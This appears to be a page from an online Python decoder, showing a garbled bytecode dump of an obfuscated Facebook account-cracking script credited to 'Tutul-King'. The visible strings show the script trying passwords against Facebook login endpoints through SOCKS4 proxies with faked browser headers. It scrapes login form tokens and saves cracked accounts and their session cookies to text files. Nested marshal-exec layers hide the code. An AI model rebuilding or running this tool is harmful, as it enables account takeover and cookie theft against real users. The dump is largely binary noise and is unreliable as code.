u[TutulXD][1;90m>~[z]>~<[]rOkz] httpz	socks4://zm.facebook.comrztext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9zmark.via.gpzsame-origincorsemptydocumentzhttps://m.facebook.com/zgzip, deflate brzen-GB,en-US;q=0.9,en;q=0.8)
Hostupgrade-insecure-requests
user-agentacceptdntx-requested-withsec-fetch-sitesec-fetch-modesec-fetch-usersec-fetch-destrefereraccept-encodingaccept-languagez8https://p.facebook.com/login/device-based/password/?uid=z)&flow=login_no_pin&refsrc=deprecated&_rdrzname="lsd" value="(.*?)"rVzname="jazoest" value="(.*?)"z)https://p.facebook.com/login/save-device/login_no_pin)lsdjazoestuidnextflowpass;c"g|]\}}|d|
S=rS.0keyvalues  r>
<listcomp>zcrack.<locals>.<listcomp>s\'^^^*#u###uu-^^^r@z m_pixel_ratio=2.625; wd=412x756z	max-age=0zhttps://m.facebook.comz!application/x-www-form-urlencodedzlhttps://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F)rz
cache-controlroriginzcontent-typerrrrrrrr r!r"zChttps://p.facebook.com/login/device-based/validate-password/?shbl=0cookieF)datacookiesheadersallow_redirectsproxies
checkpointzespeak -a 300 " Cp"u/sdcard/TutulCp.txtru rDrc_userc"g|]\}}|d|
Sr,rSr.s  r>r2zcrack.<locals>.<listcomp>s\'aaa:3333.aaar@u[TutulOk] u > u6
[10;93m[] [10;91m= [10;93mCOOKIES[10;91m z espeak -a 300 " Tutul, Ok, id"u/sdcard/TutulOk.txtu
[COOKIES] )3rchoicerkrbrxrFrGrHryloopr;rrrIrugen2rSessionproxr7updaterrsearchrrgrouprr6get_dictitemspostkeysrrrakunrcpr
rqr?cek_apksession
exceptionsConnectionErrorrJrK)r	rborua2sespwnipproxspdataakokiheadepoexcokikukis         r>rrsmQq1QqM""{r{{1{{q{${{{{3r77{TU{{XZ{{_`{{cd{{hi{{np{rt{vw{{{||}}mD
}U\'\'R&
}T3;s?
#5;.3\_jJQThuGTfl~EWalEXj}Y	Z	Z	[	[	[	
wwI#MNyyzz15s16{{CCII!LLWYW`aBEFGFLBMBMXNXNXTXTUVXWXW^aiT\jrtvv5**^^	@R@R@T@T@Z@Z@\@\^^^
_
_4	++4!+Z]gPsACMmAN`mEW^pzE	s
FXkG
H
H5V\aksuyjzDIZ_hm	n	n2bj))++002222	!Aa!}	%	%BI#$$$	$c**00WR1DEEEKKC
EB	ECK((**//1111EB					D::aaAUAUAWAWA]A]A_A_aaabbD	!Aa!}	%	%B	TqTT3TTRTTvc{{TTHJTLPTTTUUUI0111	%s++11#g+b.AS2STX2XY]2]^^^GD	E
			,:b>>>>>qs3H\'SES(S,+S,__main__zgit pullztouch .prox.txt)ruuidrrbs4jsonrFrrrJrurllib3base64stringplatformconcurrent.futuresr	Ngangkangrichzlib
rich.tablermerich.consolersolrsoprrgp
rich.panelr	nelr
cetak
rich.markdownrmarkrich.columnsrcolrprintr
	rich.textrtekzinstallCONrr?rBkalorjroplalrwrrrrr{rrprkG1G2G3G4G5rX1X2X3X4X5r|rvrGrHrCrcokbrutrDrUprincprrrErrrNrrrxdr	randranger@cdfgrrjr?rrrr>luaku2rrrBrrNrMoprekr	lisensiku	taplikasitokenkur&lisensikuniryrqrtr~rxrsirrArhhrkkrYasurruuid4hexuppermyididmygenerategetxcloserrrrrrrrgetpassattempsusernamepasswordrrrrrrPrrSr@r><module>rs
				
	
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[>>>>>>777777777777777777777777777777777777""""""\'\'\'\'\'\'$$$$$$999999$$$$$$######******\'\'\'\'\'\'   """"""[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[>>>>>>CEEFHceJLPRXZhjWYZ\PRDFDF@BXZuwDFUWMOGI[]LNuwJLTVFH]_ceZ\VXFHdfOQuwZ\}@BJL\^OQSUuwpr^`NPRTNPY[bdkmlnMO:&	
	"#
3444
H	4x|NOOTk#T""""4442333333334	T+c!!,,..
%,,B&6Aq6Aq
6Cq6Aq6Aq6Aq6Aq
1Q1111Q1111a11!11a11!11a11da6=PPPQQ6=SSSTT6As6=SSSTT36Bs6D6Bs
88q88A8q8!8Q88!8Q8888Q8888Q88U000RTTVWXYZ[\]_`bcefhiklnoqrtQtO3tBr$uVIiK

fmQq1QK AAAtz||""$$tz||!!##tDSIINNPPHH4@EEDJJtDyJJLLLLL	
>s	C	C	H	H	J	J8TTTSSS			fff,
	
1222u
ijj

u}~~Hu}~~H7x611YZZZ
`aaa1			(  DE`E`E`N0	0	0	bZRYzRY !!!!s<4JJ)J$$J)T77:U35YY

YY")marshalexecloads	Tutulking<module>r	sS]W]wZxZxZyZyZyZyZyZr)marshalexecloads	Tutulking<module>r	sS]W]_g`g`gagagagagagr)marshalexecloads	Tutulking<module>r	sS]W]GtHtHtItItItItItr)marshalexecloads	Tutulking<module>r	sS]W]o@p@p@q@q@q@q@q@r)marshalexecloads	Tutulking<module>r	sS]W]WMXMXMYMYMYMYMYMr)marshalexecloads	Tutulking<module>r	sS]W]Y@Z@ZAZAZAZAZAZr)marshalexecloads	Tutulking<module>r	sS]W]jfkfkflflflflflfr)marshalexecloads	Tutulking<module>r	sS]W]RsSsSsTsTsTsTsTsr)marshalexecloads	Tutulking<module>r	sS]W]z{{|||||r)marshalexecloads	Tutulking<module>r	sS]W]zL{L{L|L|L|L|L|Lr)marshalexecloads	Tutulking<module>r	sS]W]bYcYcYdYdYdYdYdYr)marshalexecloads	Tutulking<module>r	sS]W]JfKfKfLfLfLfLfLfr)marshalexecloads	Tutulking<module>r	sS]W]rrsrsrtrtrtrtrtrr)marshalexecloads	Tutulking<module>r	sS]W]Z[[\\\\\r)marshalexecloads	Tutulking<module>r	sS]W]_L `L `L aL aL aL aL aL r)marshalexecloads	Tutulking<module>r	sS]W]oX pX pX qX qX qX qX qX r)marshalexecloads	Tutulking<module>r	sS]W]d @e @e Ae Ae Ae Ae Ae r)marshalexecloads	Tutulking<module>r	sS]W]Rq Sq Sq Tq Tq Tq Tq Tq r)marshalexecloads	Tutulking<module>r	sS]W]b} c} c} d} d} d} d} d} r)marshalexecloads	Tutulking<module>r	sS]W]rI!sI!sI!tI!tI!tI!tI!tI!r)marshalexecloads	Tutulking<module>r	sS]W]BV!CV!CV!DV!DV!DV!DV!DV!r)marshalexecloads	Tutulking<module>r	sS]W]Rb!Sb!Sb!Tb!Tb!Tb!Tb!Tb!r)marshalexecloads	Tutulking<module>r	sS]W]bn!cn!cn!dn!dn!dn!dn!dn!r)marshalexecloads	Tutulking<module>r	sS]W]rz!sz!sz!tz!tz!tz!tz!tz!r)marshalexecloads	Tutulking<module>r	sS]W]BG"CG"CG"DG"DG"DG"DG"DG"r)marshalexecloads	Tutulking<module>r	sS]W]RS"SS"SS"TS"TS"TS"TS"TS"r)marshalexecloads	Tutulking<module>r	sS]W]b_"c_"c_"d_"d_"d_"d_"d_"r)marshalexecloads	Tutulking<module>r	sS]W]rk"sk"sk"tk"tk"tk"tk"tk"r)marshalexecloads	Tutulking<module>r	sS]W]Bx"Cx"Cx"Dx"Dx"Dx"Dx"Dx"r)marshalexecloads	Tutulking<module>r	sS]W]RD#SD#SD#TD#TD#TD#TD#TD#r)marshalexecloads	Tutulking<module>r	sS]W]bP#cP#cP#dP#dP#dP#dP#dP#r)marshalexecloads	Tutulking<module>r	sS]W]r\#s\#s\#t\#t\#t\#t\#t\#r)marshalexecloads	Tutulking<module>r	sS]W]Ji#Ki#Ki#Li#Li#Li#Li#Li#r)marshalexecloads	Tutulking<module>r	sS]W]Zu#[u#[u#\u#\u#\u#\u#\u#r)marshalexecloads	Tutulking<module>r	sS]W]oA$pA$pA$qA$qA$qA$qA$qA$r)marshalexecloads	Tutulking<module>r	sS]W]M$@N$@N$AN$AN$AN$AN$AN$r)marshalexecloads	Tutulking<module>r	sS]W]RZ$SZ$SZ$TZ$TZ$TZ$TZ$TZ$r)marshalexecloads	Tutulking<module>r	sS]W]bf$cf$cf$df$df$df$df$df$r)marshalexecloads	Tutulking<module>r	sS]W]rr$sr$sr$tr$tr$tr$tr$tr$r)marshalexecloads	Tutulking<module>r	sS]W]B$C$C$D$D$D$D$D$r)marshalexecloads	Tutulking<module>r	sS]W]jK%kK%kK%lK%lK%lK%lK%lK%r)marshalexecloads	Tutulking<module>r	sS]W]{W%|W%|W%}W%}W%}W%}W%}W%r)marshalexecloads	Tutulking<module>r	sS]W]Kd%Ld%Ld%Md%Md%Md%Md%Md%r)marshalexecloads	Tutulking<module>r	sS]W][p%\p%\p%]p%]p%]p%]p%]p%r)marshalexecloads	Tutulking<module>r	sS]W]m|%n|%n|%o|%o|%o|%o|%o|%r)marshalexecloads	Tutulking<module>r	sS]W]}H&~H&~H&H&H&H&H&H&r)marshalexecloads	Tutulking<module>r	sS]W]\U&]U&]U&^U&^U&^U&^U&^U&r)marshalexecloads	Tutulking<module>r	sS]W]ma&na&na&oa&oa&oa&oa&oa&r)marshalexecloads	Tutulking<module>r	sS]W]}m&~m&~m&m&m&m&m&m&r)marshalexecloads	Tutulking<module>r	sS]W]\z&]z&]z&^z&^z&^z&^z&^z&r)marshalexecloads	Tutulking<module>r	sS]W]mF\'nF\'nF\'oF\'oF\'oF\'oF\'oF\'r)marshalexecloads	Tutulking<module>r	sS]W]ES\'FS\'FS\'GS\'GS\'GS\'GS\'GS\'r)marshalexecloads	Tutulking<module>r	sS]W]]_\'^_\'^_\'__\'__\'__\'__\'__\'r)marshalexecloads	Tutulking<module>r	sS]W]uk\'vk\'vk\'wk\'wk\'wk\'wk\'wk\'r)marshalexecloads	Tutulking<module>r	sS]W]Mx\'Nx\'Nx\'Ox\'Ox\'Ox\'Ox\'Ox\'r)marshalexecloads	Tutulking<module>r	sS]W]eD(fD(fD(gD(gD(gD(gD(gD(r)marshalexecloads	Tutulking<module>r	sS]W]uP(vP(vP(wP(wP(wP(wP(wP(r)marshalexecloads	Tutulking<module>r	sS]W]E](F](F](G](G](G](G](G](r)marshalexecloads	Tutulking<module>r	sS]W]Ui(Vi(Vi(Wi(Wi(Wi(Wi(Wi(r)marshalexecloads	Tutulking<module>r	sS]W]eu(fu(fu(gu(gu(gu(gu(gu(r)marshalexecloads	Tutulking<module>r	sS]W]uA)vA)vA)wA)wA)wA)wA)wA)r)marshalexecloads	Tutulking<module>r	sS]W]EN)FN)FN)GN)GN)GN)GN)GN)r)marshalexecloads	Tutulking<module>r	sS]W]UZ)VZ)VZ)WZ)WZ)WZ)WZ)WZ)r)marshalexecloads	Tutulking<module>r	sS]W]ef)ff)ff)gf)gf)gf)gf)gf)r)marshalexecloads	Tutulking<module>r	sS]W]ur)vr)vr)wr)wr)wr)wr)wr)r)marshalexecloads	Tutulking<module>r	sS]W]E)F)F)G)G)G)G)G)r)marshalexecloads	Tutulking<module>r	sS]W]mK*nK*nK*oK*oK*oK*oK*oK*r)marshalexecloads	Tutulking<module>r	sS]W]}W*~W*~W*W*W*W*W*W*r)marshalexecloads	Tutulking<module>r	sS]W]\d*]d*]d*^d*^d*^d*^d*^d*r)marshalexecloads	Tutulking<module>r	sS]W]mp*np*np*op*op*op*op*op*r)marshalexecloads	Tutulking<module>r	sS]W]}|*~|*~|*|*|*|*|*|*r)marshalexecloads	Tutulking<module>r	sS]W]\I+]I+]I+^I+^I+^I+^I+^I+r)marshalexecloads	Tutulking<module>r	sS]W]mU+nU+nU+oU+oU+oU+oU+oU+r)marshalexecloads	Tutulking<module>r	sS]W]}a+~a+~a+a+a+a+a+a+r)marshalexecloads	Tutulking<module>r	sS]W]\n+]n+]n+^n+^n+^n+^n+^n+r)marshalexecloads	Tutulking<module>r	sS]W]mz+nz+nz+oz+oz+oz+oz+oz+r)marshalexecloads	Tutulking<module>r	sS]W]@G,AG,AG,BG,BG,BG,BG,BG,r)marshalexecloads	Tutulking<module>r	sS]W]SS,TS,TS,US,US,US,US,US,r')) 
 ?>

Did this file decode correctly?

Original Code

# Encoded By Tutul-King
# Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro
# Fb Link: https://www.facebook.com/Tutul.Official.Account
# https://github.com/Tutul-King

import marshal


Function Calls

None

Variables

None

Stats

MD5 f9b549919e53bc6db5f2e5148eebfbd0
Eval Count 0
Decode Time 155 ms